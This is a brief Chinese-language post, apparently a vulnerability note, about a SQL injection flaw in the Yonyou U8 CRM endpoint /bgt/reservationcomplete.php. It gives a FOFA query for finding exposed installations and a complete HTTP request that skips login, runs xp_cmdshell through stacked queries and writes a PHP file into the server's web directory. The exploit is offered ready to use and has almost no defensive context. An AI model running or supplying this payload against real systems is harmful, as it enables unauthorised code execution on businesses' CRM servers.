Babing
Published on 2024-08-30 / 2 Visits
0
0

Y15-8用友-U8+CRM-SQL

Y15-8用友-U8+CRM-SQL

漏洞描述:

用友U8-CRM系统接口 /bgt/reservationcomplete.php 存在SQL注入漏洞

fofa语法:

app.name=“用友 CRM”

漏洞复现:

payload:

GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\hello.php%27; HTTP/1.1
Host:

Comment